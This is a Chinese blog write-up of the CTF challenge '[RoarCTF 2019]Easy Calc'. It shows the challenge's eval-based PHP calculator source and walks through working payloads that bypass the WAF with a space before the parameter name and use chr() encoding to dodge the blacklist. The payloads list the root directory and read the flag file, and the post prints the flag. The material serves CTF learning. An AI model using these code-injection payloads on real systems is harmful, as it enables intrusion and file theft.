buuctf-web-[RoarCTF 2019]Easy Calc1

最新推荐文章于 2023-12-15 12:02:29 发布
最新推荐文章于 2023-12-15 12:02:29 发布
阅读量1.1k 收藏 2
点赞数 2
分类专栏: buuctfweb ctf 文章标签: php Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29977871/article/details/128730416
版权

打开环境

发现一个类似计算器的东西

尝试一些常规的测试参数

尝试单引号发现提示,但是并未报错,非sql注入

查看源代码

找到一段JavaScript脚本

<script>
    $('#calc').submit(function(){
        $.ajax({
            url:"calc.php?num="+encodeURIComponent($("#content").val()),
            type:'GET',
            success:function(data){
                $("#result").html(`<div class="alert alert-success">
            <strong>答案:</strong>${data}
            </div>`);
            },
            error:function(){
                alert("这啥?算不来!");
            }
        })
        return false;
    })
</script>

访问calc.php

发现源代码

<?php
error_reporting(0);
if(!isset($_GET['num'])){
    show_source(__FILE__);
}else{
        $str = $_GET['num'];
        $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];
        foreach ($blacklist as $blackitem) {
                if (preg_match('/' . $blackitem . '/m', $str)) {
                        die("what are you want to do?");
                }
        }
        eval('echo '.$str.';');
}
?>

需要对num进行传参,并且有黑名单,需要进行绕过

尝试payload

http://node4.buuoj.cn:26562/calc.php?num=1;var_dump(scandir(chr(47)))

进行修改

http://node4.buuoj.cn:26562/calc.php? num=1;var_dump(scandir(chr(47)))

num参数禁止传入字母,可以在问号和num之间加入空格进行绕过

var_dump()用来打印

scandir()用来获扫描目录下文件

chr(47)是“/”的ASCII编码

进行内容读取的payload

http://node4.buuoj.cn:26562/calc.php? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))

file_get_contents() 函数是用于将文件的内容读入到一个字符串中的首选方法

chr(47)是/的ASCII编码

chr(102)是f的ASCII编码

chr(49)是1的ASCII编码

chr(97)是a的ASCII编码

chr(103)是g的ASCII编码

flag{af9d35dd-c8bc-4185-968c-983d75685794}

mlws1900
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xlsx-calc:javascript nodejs excel公式解析器
04-28
_ __ ____ _ _ ___ __ __ ___ ( \/ )( ) / ___)( \/ ) / __) / _\ ( ) / __) ) ( / (_/\\___ \ ) ( ( (__ / \/ (_/\( (__ (_/\_)\____/(____/(_/\_) \___)\_/\_/\____/ \___)安装使用 : npm install xlsx-calc如何...
BUUCTF [RoarCTF 2019]Easy Calc1
lzu_lfl的博客
09-11 1271
BUUCTF [RoarCTF 2019]Easy Calc1 WP
[RoarCTF 2019]Easy Calc 1
shinygod的博客
01-28 1305
考点: 1、PHP的字符串解析特性 2、文件读取 3、WAF绕过 查看源代码:提示有WAF 访问calc.php:发现可传一个参数num 尝试: 发现num为字母时报错,所以WAF可能是拦截num为字母的情况。所以我们要绕过WAF才能做我们想要的操作,而calc.php的黑名单限制了我们直接文件读取。 所以我们只要做两个操作: 1、过WAF 2、过黑名单 在做第一个操作时:要先了解PHP的字符串解析特性,(网上大佬的解释.) php把URL参数转换为变量的过程中,它会做两件事: 1.删除空白符
[RoarCTF 2019]Easy Calc1
陈艺秋的博客
07-02 544
看这个输入框,所以我猜测可能是sql注入,弹出了一个对话框,说算不来,说明可能存在过滤最后发现只要传入字母都会触发弹窗,应该跟题目设定有关系,这只是一个简单的计算器而已查看了一下源码,发现有一个传参,访问一下calc.php文件访问后得到一串php源码首先建立了一个黑名单列表,然后是一个foreach循环,用于遍历$blacklist数组中的每个元素。在循环中,blackitem变量被赋值为blacklist数组中的当前元素。然后,循环体内的代码会执行,可以对$blackitem进行任何操作。
[RoarCTF 2019]Easy Calc1 wp
最新发布
m0_73612768的博客
12-15 1156
这里用到的方法有:空格绕过,url 溢出,http 请求走私。三种方法均可用来绕过 waf
calc-ui-web
02-26
计算器UI网站 计算器用户界面Web应用程序。 使用Vue框架实现计算器用户界面。
wc-interest-calc:作为Web组件的简单复合兴趣计算器
02-06
兴趣计算器作为Web组件 作为网络组件构建的简单的复合兴趣计算器。 您可以根据其他值计算本金,利息,期限或最终金额。如何使用在页面中包含interest-component.js脚本。 然后使用wc-interest-calc选择器在页面中...
gnome-shell-extension-modern-calc:Modern Calc将成为gnome Shell的全功能计算器
05-08
使用术语检查系统测试中逗号的gnome-calculator可接受的小数点:gnome-calculator -s“ 2,2 + 1”测试点:gnome-calculator -s“ 2.2 + 1” If the result of the calculus above is 3.2 (dot is decimal mark) or ...
【BUUCTF】[RoarCTF 2019]Easy Calc1
aoao331198的博客
03-14 327
题目网页是一个计算器 查看源代码发现线索calc.php 直接访问 这里对eval对get的内容执行,尝试注入php代码 前面也说了waf,我们这里利用php解析字符串的特性来绕过 PHP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会做两件事: 1)删除空白符 2)将某些字符转换为下划线(包括空格) 图片来源博客PHP字符串解析特性 ($GET/$POST参数绕过)(含例题 buuctf easycalc)_bin789456的博客-CS...
[RoarCTF 2019]Easy Calc
热门推荐
沐目的博客
10-18 1万+
1.知识点 1.1PHP的字符串解析特性 这是别人对PHP字符串解析漏洞的理解, 我们知道PHP将查询字符串(在URL或正文中)转换为内部$_GET或的关联数组$_POST。例如:/?foo=bar变成Array([foo] => “bar”)。值得注意的是,查询字符串在解析的过程中会将某些字符删除或用下划线代替。例如,/?%20news[id%00=42会转换为Array([news_id...
[roarctf 2019]easy calc
03-16
这道题是一道简单的逆向工程题目,给出了一个计算器程序和加密后的标志,需要我们破解加密算法并计算出正确的标志。 我们可以使用反编译工具对程序进行反编译,然后找到加密算法的相关代码。在这个程序中,加密算法...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值